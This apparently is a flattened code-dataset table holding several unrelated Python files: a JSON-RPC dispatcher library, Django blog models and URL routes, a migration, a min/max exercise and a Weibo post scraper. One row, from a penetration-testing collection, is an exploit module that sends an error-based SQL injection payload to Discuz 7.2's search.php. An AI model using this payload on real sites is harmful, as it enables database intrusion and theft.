"""
@classmethod
def __methods__(cls) -> Any:
for attr_name in filter(lambda name: not name.startswith('_'), dir(cls)):
attr = getattr(cls, attr_name)
if callable(attr):
yield attr
class MethodRegistry:
"""
Method registry.
:param prefix: method name prefix to be used for naming containing methods
"""
def __init__(self, prefix: Optional[str] = None):
self._prefix = prefix
self._registry: Dict[str, Method] = {}
def __iter__(self) -> Iterator[str]:
"""
Returns registry method iterator.
"""
return iter(self._registry)
def __getitem__(self, item: str) -> Method:
"""
Returns a method from the registry by name.
:param item: method name
:returns: found method
:raises: KeyError
"""
return self._registry[item]
def items(self) -> ItemsView[str, Method]:
return self._registry.items()
def keys(self) -> KeysView[str]:
return self._registry.keys()
def values(self) -> ValuesView[Method]:
return self._registry.values()
def get(self, item: str) -> Optional[Method]:
"""
Returns a method from the registry by name.
:param item: method name
:returns: found method or `None`
"""
return self._registry.get(item)
def add(
self,
rpc_method: RpcMethod,
name: Optional[str] = None,
context: Context = None,
) -> RpcMethod:
"""
Decorator adding decorated method to the registry.
:param rpc_method: method
:param name: method name to be used instead of `__name__` attribute
:param context: parameter name to be used as an application context
:returns: decorated method or decorator
"""
# https://stackoverflow.com/questions/65588913/mypy-type-annotations-for-a-decorator
t = TypeVar("t", bound=Callable[..., Any])
def decorator(method: t) -> t:
full_name = ".".join(filter(None, (self._prefix, name or method.__name__)))
self.add_methods(Method(method, full_name, context))
return method
return decorator(rpc_method)
def add_methods(self, *methods: Union[RpcMethod, Method]) -> None:
"""
Adds methods to the registry.
:param methods: methods to be added. Each one can be an instance of :py:class:`xjsonrpc.server.Method`
or plain method
"""
for method in methods:
if isinstance(method, Method):
self._add_method(method)
else:
self.add(method)
def view(
self, maybe_view: Optional[Type[ViewMixin]] = None, context: Optional[Any] = None, prefix: Optional[str] = None,
) -> Union[ViewMixin, Callable[..., Any]]:
"""
Methods view decorator.
:param maybe_view: view class instance or `None`
:param context: application context name
:param prefix: view methods prefix
:return: decorator or decorated view
"""
def decorator(view: Type[ViewMixin]) -> Type[ViewMixin]:
for method in view.__methods__():
full_name = '.'.join(filter(None, (self._prefix, prefix, method.__name__)))
self._add_method(ViewMethod(view, method.__name__, full_name, context))
return view
# maybe_view's type depends on the usage of the decorator. It's a View
# if it's used as `@view` but ``None`` if used as `@view()`.
if maybe_view is None:
return decorator
else:
return decorator(maybe_view)
def merge(self, other: 'MethodRegistry') -> None:
"""
Merges two registries.
:param other: registry to be merged in the current one
"""
for name, method in other.items():
if self._prefix:
name = f'{self._prefix}.{name}'
self._add_method(method.copy(name=name))
def _add_method(self, method: Method) -> None:
if method.name in self._registry:
logger.warning(f"method '{method.name}' already registered")
self._registry[method.name] = method
class JSONEncoder(xjsonrpc.JSONEncoder):
"""
Server JSON encoder. All custom server encoders should be inherited from it.
"""
def default(self, o: Any) -> Any:
if isinstance(o, validators.base.ValidationError):
return list(o.args)
return super().default(o)
class BaseDispatcher:
"""
Method dispatcher.
:param request_class: JSON-RPC request class
:param response_class: JSON-RPC response class
:param batch_request: JSON-RPC batch request class
:param batch_response: JSON-RPC batch response class
:param json_loader: request json loader
:param json_dumper: response json dumper
:param json_encoder: response json encoder
:param json_decoder: request json decoder
:param middlewares: request middlewares
:param error_handlers: request error handlers
"""
def __init__(
self,
*,
request_class: Type[Request] = v20.Request,
response_class: Type[Response] = v20.Response,
batch_request: Type[BatchRequest] = v20.BatchRequest,
batch_response: Type[BatchResponse] = v20.BatchResponse,
json_loader: Callable[..., Any] = json.loads,
json_dumper: Callable[..., str] = json.dumps,
json_encoder: Type[JSONEncoder] = JSONEncoder,
json_decoder: Optional[Type[json.JSONDecoder]] = None,
middlewares: Iterable[Callable[..., Any]] = (),
error_handlers: Dict[Union[None, int, Exception], List[Callable[..., Any]]] = {},
):
self._json_loader = json_loader
self._json_dumper = json_dumper
self._json_encoder = json_encoder
self._json_decoder = json_decoder
self._request_class = request_class
self._response_class = response_class
self._batch_request = batch_request
self._batch_response = batch_response
self._middlewares = list(middlewares)
self._error_handlers = error_handlers
self._registry = MethodRegistry()
@property
def registry(self) -> MethodRegistry:
return self._registry
def add(
self,
method: RpcMethod,
name: Optional[str] = None,
context: Optional[Any] = None,
) -> None:
"""
Adds method to the registry.
:param method: method
:param name: method name
:param context: application context name
"""
self._registry.add(method, name, context)
def add_methods(self, *methods: Union[MethodRegistry, Method, RpcMethod]) -> None:
"""
Adds methods to the registry.
:param methods: method list. Each method may be an instance of :py:class:`xjsonrpc.server.MethodRegistry`,
:py:class:`xjsonrpc.server.Method` or plain function
"""
for method in methods:
if isinstance(method, MethodRegistry):
self._registry.merge(method)
elif isinstance(method, Method):
self._registry.add_methods(method)
else:
self._registry.add(method)
def view(self, view: Type[ViewMixin]) -> None:
"""
Adds class based view to the registry.
:param view: view to be added
"""
self._registry.view(view)
class Dispatcher(BaseDispatcher):
def dispatch(self, request_text: str, context: Optional[Any] = None) -> Optional[str]:
"""
Deserializes request, dispatches it to the required method and serializes the result.
:param request_text: request text representation
:param context: application context (if supported)
:return: response text representation
"""
logger.getChild('request').debug("request received: %s", request_text)
response: Union[Response, BatchResponse, UnsetType] = UNSET
try:
request_json = self._json_loader(request_text, cls=self._json_decoder)
if isinstance(request_json, (list, tuple)):
batch_request = self._batch_request.from_json(request_json)
response = self._batch_response(
*cast(
BatchResponse,
filter(
lambda resp: resp is not UNSET, (
self._handle_request(request, context)
for request in batch_request
)
)
)
)
else:
request = self._request_class.from_json(request_json)
response = self._handle_request(request, context)
except json.JSONDecodeError as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.ParseError(data=str(e)))
except (xjsonrpc.exceptions.DeserializationError, xjsonrpc.exceptions.IdentityError) as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.InvalidRequestError(data=str(e)))
if isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
logger.getChild('response').debug("response sent: %s", response_text)
return response_text
def _handle_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
try:
handler = self._handle_rpc_request
for middleware in reversed(self._middlewares):
handler = ft.partial(middleware, handler=handler)
return handler(request, context)
except xjsonrpc.exceptions.JsonRpcError as e:
logger.info("method execution error %s(%r): %r", request.method, request.params, e)
error = e
except Exception as e:
logger.exception("internal server error: %r", e)
error = xjsonrpc.exceptions.InternalError()
for handler in it.chain(self._error_handlers.get(None, []), self._error_handlers.get(error.code, [])):
error = handler(request, context, error)
if request.id is None:
return UNSET
return self._response_class(id=request.id, error=error)
def _handle_rpc_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
result = self._handle_rpc_method(request.method, request.params, context)
if request.id is None:
return UNSET
return self._response_class(id=request.id, result=result)
def _handle_rpc_method(
self, method_name: str, params: Optional[Union[lst, dct]], context: Optional[Any]
) -> Any:
method = self._registry.get(method_name)
if method is None:
raise xjsonrpc.exceptions.MethodNotFoundError(data=f"method '{method_name}' not found")
try:
bound = method.bind(params, context=context)
except validators.ValidationError as e:
raise xjsonrpc.exceptions.InvalidParamsError(data=e) from e
try:
return bound()
except xjsonrpc.exceptions.JsonRpcError:
raise
except Exception as e:
logger.exception("method unhandled exception %s(%r): %r", method_name, params, e)
raise xjsonrpc.exceptions.ServerError() from e
class AsyncDispatcher(BaseDispatcher):
"""
Asynchronous method dispatcher.
"""
async def dispatch(self, request_text: str, context: Optional[Any] = None) -> Optional[str]:
"""
Deserializes request, dispatches it to the required method and serializes the result.
:param request_text: request text representation
:param context: application context (if supported)
:return: response text representation
"""
logger.getChild('request').debug("request received: %s", request_text)
response: Union[Response, BatchResponse, UnsetType] = UNSET
try:
request_json = self._json_loader(request_text, cls=self._json_decoder)
if isinstance(request_json, (list, tuple)):
batch_request = self._batch_request.from_json(request_json)
response = self._batch_response(
*filter(
lambda resp: resp is not UNSET, await asyncio.gather(
*(self._handle_request(request, context)
for request in batch_request)
),
)
)
else:
request = self._request_class.from_json(request_json)
response = await self._handle_request(request, context)
if not response or isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
except json.JSONDecodeError as e:
response = self._response_class(
id=None, error=xjsonrpc.exceptions.ParseError(data=str(e))
)
except (xjsonrpc.exceptions.DeserializationError,
xjsonrpc.exceptions.IdentityError) as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.InvalidRequestError(data=str(e)))
if isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
logger.getChild('response').debug("response sent: %s", response_text)
return response_text
async def _handle_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
try:
handler = self._handle_rpc_request
for middleware in reversed(self._middlewares):
handler = ft.partial(middleware, handler=handler)
return await handler(request, context)
except xjsonrpc.exceptions.JsonRpcError as e:
logger.info("method execution error %s(%r): %r", request.method, request.params, e)
error = e
except Exception as e:
logger.exception("internal server error: %r", e)
error = xjsonrpc.exceptions.InternalError()
for handler in it.chain(self._error_handlers.get(None, []), self._error_handlers.get(error.code, [])):
error = await handler(request, context, error)
if request.id is None:
return UNSET
return self._response_class(id=request.id, error=error)
async def _handle_rpc_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
result = await self._handle_rpc_method(request.method, request.params, context)
if request.id is None:
return UNSET
return self._response_class(id=request.id, result=result)
async def _handle_rpc_method(
self, method_name: str, params: RpcParams, context: Optional[Any],
) -> Any:
method = self._registry.get(method_name)
if method is None:
raise xjsonrpc.exceptions.MethodNotFoundError(data=f"method '{method_name}' not found")
try:
bound = method.bind(params, context=context)
except validators.ValidationError as e:
raise xjsonrpc.exceptions.InvalidParamsError(data=e) from e
try:
result = bound()
if asyncio.iscoroutine(result):
result = await result
return result
except xjsonrpc.exceptions.JsonRpcError:
raise
except Exception as e:
logger.exception("method unhandled exception %s(%r): %r", method_name, params, e)
raise xjsonrpc.exceptions.ServerError() from e
| en | 0.709107 | JSON-RPC method wrapper. Stores method itself and some metainformation. :param method: method :param name: method name :param context: context name # sourcery skip: dict-assign-update-to-union # sourcery skip: assign-if-exp, reintroduce-else, swap-if-expression View method. :param view_cls: view class :param name: view class method name :param context: context name # type: ignore # sourcery skip: dict-assign-update-to-union Simple class based method handler mixin. Exposes all public methods. Method registry. :param prefix: method name prefix to be used for naming containing methods Returns registry method iterator. Returns a method from the registry by name. :param item: method name :returns: found method :raises: KeyError Returns a method from the registry by name. :param item: method name :returns: found method or `None` Decorator adding decorated method to the registry. :param rpc_method: method :param name: method name to be used instead of `__name__` attribute :param context: parameter name to be used as an application context :returns: decorated method or decorator # https://stackoverflow.com/questions/65588913/mypy-type-annotations-for-a-decorator Adds methods to the registry. :param methods: methods to be added. Each one can be an instance of :py:class:`xjsonrpc.server.Method` or plain method Methods view decorator. :param maybe_view: view class instance or `None` :param context: application context name :param prefix: view methods prefix :return: decorator or decorated view # maybe_view's type depends on the usage of the decorator. It's a View # if it's used as `@view` but ``None`` if used as `@view()`. Merges two registries. :param other: registry to be merged in the current one Server JSON encoder. All custom server encoders should be inherited from it. Method dispatcher. :param request_class: JSON-RPC request class :param response_class: JSON-RPC response class :param batch_request: JSON-RPC batch request class :param batch_response: JSON-RPC batch response class :param json_loader: request json loader :param json_dumper: response json dumper :param json_encoder: response json encoder :param json_decoder: request json decoder :param middlewares: request middlewares :param error_handlers: request error handlers Adds method to the registry. :param method: method :param name: method name :param context: application context name Adds methods to the registry. :param methods: method list. Each method may be an instance of :py:class:`xjsonrpc.server.MethodRegistry`, :py:class:`xjsonrpc.server.Method` or plain function Adds class based view to the registry. :param view: view to be added Deserializes request, dispatches it to the required method and serializes the result. :param request_text: request text representation :param context: application context (if supported) :return: response text representation Asynchronous method dispatcher. Deserializes request, dispatches it to the required method and serializes the result. :param request_text: request text representation :param context: application context (if supported) :return: response text representation | 1.998961 | 2 |
exploit/cms_discuz_7_2_sortid_sql_injection.py | Micr067/pentestdb | 686 | 6632544 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2015 alpha1e0
'''
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
class DiscuzSI(Exploit):
expName = u"Discuz 7.2 主题分类 SQL注入"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "discuz"
appVersion = "7.x"
reference = ['http://www.wooyun.org/bugs/wooyun-2014-068707']
description = u'''
该exploit未验证通过
漏洞利用条件:1.Discuz 7.2,2.开启主题分类;2.登陆
'''
def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = {
"formhash":"04949b0",
"srchtxt":"aa",
"srchtype":"threadsort",
"st":"on",
"sortid":"3",
"selectsortid": "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#".format(sig),
"searchsubmit":"true"
}
url = self.urlJoin("/search.php")
response = self.http.post(url, data=payload)
if response.status_code==200:
if sig in response.content and "SQL" in response.content:
result['fullpath'] = response.request.body
result['payload'] = response.request.body
return result
| #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2015 alpha1e0
'''
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
class DiscuzSI(Exploit):
expName = u"Discuz 7.2 主题分类 SQL注入"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "discuz"
appVersion = "7.x"
reference = ['http://www.wooyun.org/bugs/wooyun-2014-068707']
description = u'''
该exploit未验证通过
漏洞利用条件:1.Discuz 7.2,2.开启主题分类;2.登陆
'''
def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = {
"formhash":"04949b0",
"srchtxt":"aa",
"srchtype":"threadsort",
"st":"on",
"sortid":"3",
"selectsortid": "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#".format(sig),
"searchsubmit":"true"
}
url = self.urlJoin("/search.php")
response = self.http.post(url, data=payload)
if response.status_code==200:
if sig in response.content and "SQL" in response.content:
result['fullpath'] = response.request.body
result['payload'] = response.request.body
return result
| zh | 0.255431 | #!/usr/bin/env python #-*- coding:utf-8 -*- Pentestdb, a database for penetration test. Copyright (c) 2015 alpha1e0 该exploit未验证通过 漏洞利用条件:1.Discuz 7.2,2.开启主题分类;2.登陆 #".format(sig), | 2.38675 | 2 |
blog/models.py | siyingcheng/bAd-Robot | 0 | 6632545 | import markdown
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.utils.html import strip_tags
from mdeditor.fields import MDTextField
class Category(models.Model):
name = models.CharField(max_length=64)
class Meta:
verbose_name = '分类'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
def posts(self):
return self.post_set.filter(is_delete=False)
class Label(models.Model):
name = models.CharField(max_length=64)
class Meta:
verbose_name = '标签'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Post(models.Model):
title = models.CharField('标题', max_length=128)
# body = models.TextField('正文')
body = MDTextField('正文')
c_time = models.DateField('创建时间', auto_now_add=True)
m_time = models.DateField('修改时间', auto_now=True)
excerpt = models.CharField('摘要', max_length=200, blank=True)
category = models.ForeignKey(Category, verbose_name='分类', null=True, blank=True, on_delete=models.SET_NULL)
labels = models.ManyToManyField(Label, verbose_name='标签', blank=True)
author = models.ForeignKey(User, verbose_name='作者', null=True, blank=True, on_delete=models.SET_NULL)
is_delete = models.BooleanField('是否删除', default=False)
class Meta:
verbose_name = '文章'
verbose_name_plural = verbose_name
ordering = ['-c_time', '-pk']
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:detail', kwargs={'pk': self.pk})
def save(self, *args, **kwargs):
# 首先实例化一个 Markdown 类,用于渲染 body 的文本。
# 由于摘要并不需要生成文章目录,所以去掉了目录拓展。
md = markdown.Markdown(extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
])
# 先将 Markdown 文本渲染成 HTML 文本
# strip_tags 去掉 HTML 文本的全部 HTML 标签
# 从文本摘取前 54 个字符赋给 excerpt
if not self.excerpt:
_body = strip_tags(md.convert(self.body))
length = min(len(_body), 197)
self.excerpt = _body[:length] + '...'
super().save(*args, **kwargs)
| import markdown
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.utils.html import strip_tags
from mdeditor.fields import MDTextField
class Category(models.Model):
name = models.CharField(max_length=64)
class Meta:
verbose_name = '分类'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
def posts(self):
return self.post_set.filter(is_delete=False)
class Label(models.Model):
name = models.CharField(max_length=64)
class Meta:
verbose_name = '标签'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Post(models.Model):
title = models.CharField('标题', max_length=128)
# body = models.TextField('正文')
body = MDTextField('正文')
c_time = models.DateField('创建时间', auto_now_add=True)
m_time = models.DateField('修改时间', auto_now=True)
excerpt = models.CharField('摘要', max_length=200, blank=True)
category = models.ForeignKey(Category, verbose_name='分类', null=True, blank=True, on_delete=models.SET_NULL)
labels = models.ManyToManyField(Label, verbose_name='标签', blank=True)
author = models.ForeignKey(User, verbose_name='作者', null=True, blank=True, on_delete=models.SET_NULL)
is_delete = models.BooleanField('是否删除', default=False)
class Meta:
verbose_name = '文章'
verbose_name_plural = verbose_name
ordering = ['-c_time', '-pk']
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:detail', kwargs={'pk': self.pk})
def save(self, *args, **kwargs):
# 首先实例化一个 Markdown 类,用于渲染 body 的文本。
# 由于摘要并不需要生成文章目录,所以去掉了目录拓展。
md = markdown.Markdown(extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
])
# 先将 Markdown 文本渲染成 HTML 文本
# strip_tags 去掉 HTML 文本的全部 HTML 标签
# 从文本摘取前 54 个字符赋给 excerpt
if not self.excerpt:
_body = strip_tags(md.convert(self.body))
length = min(len(_body), 197)
self.excerpt = _body[:length] + '...'
super().save(*args, **kwargs)
| zh | 0.968222 | # body = models.TextField('正文') # 首先实例化一个 Markdown 类,用于渲染 body 的文本。 # 由于摘要并不需要生成文章目录,所以去掉了目录拓展。 # 先将 Markdown 文本渲染成 HTML 文本 # strip_tags 去掉 HTML 文本的全部 HTML 标签 # 从文本摘取前 54 个字符赋给 excerpt | 2.230637 | 2 |
src/pretalx/person/migrations/0030_auto_20211127_0152.py | lili668668/pretalx | 0 | 6632546 | <reponame>lili668668/pretalx
# Generated by Django 3.2.8 on 2021-11-27 01:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('submission', '0063_remove_track_color'),
('person', '0029_contact_track'),
]
operations = [
migrations.RemoveField(
model_name='speakerinformation',
name='limit_types',
),
migrations.AlterField(
model_name='contact',
name='track',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='contacts', to='submission.track'),
),
]
| # Generated by Django 3.2.8 on 2021-11-27 01:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('submission', '0063_remove_track_color'),
('person', '0029_contact_track'),
]
operations = [
migrations.RemoveField(
model_name='speakerinformation',
name='limit_types',
),
migrations.AlterField(
model_name='contact',
name='track',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='contacts', to='submission.track'),
),
] | en | 0.905643 | # Generated by Django 3.2.8 on 2021-11-27 01:52 | 1.459703 | 1 |
jupyterhub_configurator_config.py | GeorgianaElena/jupyterhub-configurator | 1 | 6632547 | import os
import json
HERE = os.path.dirname(os.path.abspath(__file__))
c.Configurator.selected_fields = ["z2jh.image", "z2jh.default_interface"]
| import os
import json
HERE = os.path.dirname(os.path.abspath(__file__))
c.Configurator.selected_fields = ["z2jh.image", "z2jh.default_interface"]
| none | 1 | 1.703809 | 2 |
|
MissingPersons/urls.py | sriramcu/MissingPersonsTracing | 0 | 6632548 | <gh_stars>0
"""django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from police import views as police_views
from django.views.generic import RedirectView
from django.conf.urls import re_path, url, include
urlpatterns = [
path('admin/', admin.site.urls),
path('register/', police_views.register, name='register'),
path('register_case/', police_views.register_case, name='register_case'),
path('profile/', police_views.profile, name='profile'),
path('tables/', police_views.tables, name='tables'),
path('status/', police_views.status, name='status'),
path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
path('facial_recognition/', police_views.facial_recognition, name='facial_recognition'),
path('show_all/', police_views.show_all, name='show_all'),
path('upload/', police_views.upload, name='upload'),
path('',police_views.base, name='base'),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| """django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from police import views as police_views
from django.views.generic import RedirectView
from django.conf.urls import re_path, url, include
urlpatterns = [
path('admin/', admin.site.urls),
path('register/', police_views.register, name='register'),
path('register_case/', police_views.register_case, name='register_case'),
path('profile/', police_views.profile, name='profile'),
path('tables/', police_views.tables, name='tables'),
path('status/', police_views.status, name='status'),
path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
path('facial_recognition/', police_views.facial_recognition, name='facial_recognition'),
path('show_all/', police_views.show_all, name='show_all'),
path('upload/', police_views.upload, name='upload'),
path('',police_views.base, name='base'),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | en | 0.545488 | django_project URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) | 2.438789 | 2 |
Assignment5.py | AnkurDesai11/PY4E | 0 | 6632549 | '''
Created on 16 Aug, 2020
@author: ABD
'''
largest = None
smallest = None
num = None
inp = None
while inp!='done' :
try :
inp = input("Enter a number: ")
if inp=='done' :
break
num = int(inp)
if largest==None :
largest=num
if smallest==None :
smallest=num
if largest<num :
largest=num
if smallest>num :
smallest=num
except :
print("Invalid input")
print("Maximum is", largest)
print("Minimum is", smallest) | '''
Created on 16 Aug, 2020
@author: ABD
'''
largest = None
smallest = None
num = None
inp = None
while inp!='done' :
try :
inp = input("Enter a number: ")
if inp=='done' :
break
num = int(inp)
if largest==None :
largest=num
if smallest==None :
smallest=num
if largest<num :
largest=num
if smallest>num :
smallest=num
except :
print("Invalid input")
print("Maximum is", largest)
print("Minimum is", smallest) | en | 0.705805 | Created on 16 Aug, 2020 @author: ABD | 3.963786 | 4 |
python/weibo/ajax.py | fengyuanzemin/spider-example | 0 | 6632550 | import requests
from urllib.parse import urlencode
from pyquery import PyQuery as pq
import time
base_url = 'https://m.weibo.cn/api/container/getIndex?'
headers = {
'Host': 'm.weibo.cn',
'Referer': 'https://m.weibo.cn/u/2830678474',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
}
max_page = 10
array = []
def get_page(page):
params = {
'type': 'uid',
'value': '3217179555',
'containerid': '1076033217179555',
'page': page
}
url = base_url + urlencode(params)
try:
response = requests.get(url, headers=headers)
if response.status_code == 200:
return response.json(), page
except requests.ConnectionError as e:
print('Error', e.args)
def parse_page(json, page: int):
if json:
items = json.get('data').get('cards')
for index, item in enumerate(items):
if page == 1 and index == 1:
continue
else:
item = item.get('mblog', {})
weibo = {}
weibo['id'] = item.get('id')
weibo['text'] = pq(item.get('text')).text()
weibo['attitudes'] = item.get('attitudes_count')
weibo['comments'] = item.get('comments_count')
weibo['reposts'] = item.get('reposts_count')
yield weibo
if __name__ == '__main__':
for page in range(1, max_page + 1):
json = get_page(page)
results = parse_page(*json)
for result in results:
print(result)
array.append(result)
time.sleep(1)
# 不先添加到文件中了
| import requests
from urllib.parse import urlencode
from pyquery import PyQuery as pq
import time
base_url = 'https://m.weibo.cn/api/container/getIndex?'
headers = {
'Host': 'm.weibo.cn',
'Referer': 'https://m.weibo.cn/u/2830678474',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
}
max_page = 10
array = []
def get_page(page):
params = {
'type': 'uid',
'value': '3217179555',
'containerid': '1076033217179555',
'page': page
}
url = base_url + urlencode(params)
try:
response = requests.get(url, headers=headers)
if response.status_code == 200:
return response.json(), page
except requests.ConnectionError as e:
print('Error', e.args)
def parse_page(json, page: int):
if json:
items = json.get('data').get('cards')
for index, item in enumerate(items):
if page == 1 and index == 1:
continue
else:
item = item.get('mblog', {})
weibo = {}
weibo['id'] = item.get('id')
weibo['text'] = pq(item.get('text')).text()
weibo['attitudes'] = item.get('attitudes_count')
weibo['comments'] = item.get('comments_count')
weibo['reposts'] = item.get('reposts_count')
yield weibo
if __name__ == '__main__':
for page in range(1, max_page + 1):
json = get_page(page)
results = parse_page(*json)
for result in results:
print(result)
array.append(result)
time.sleep(1)
# 不先添加到文件中了
| zh | 0.995915 | # 不先添加到文件中了 | 2.981446 | 3 |
Subsets and Splits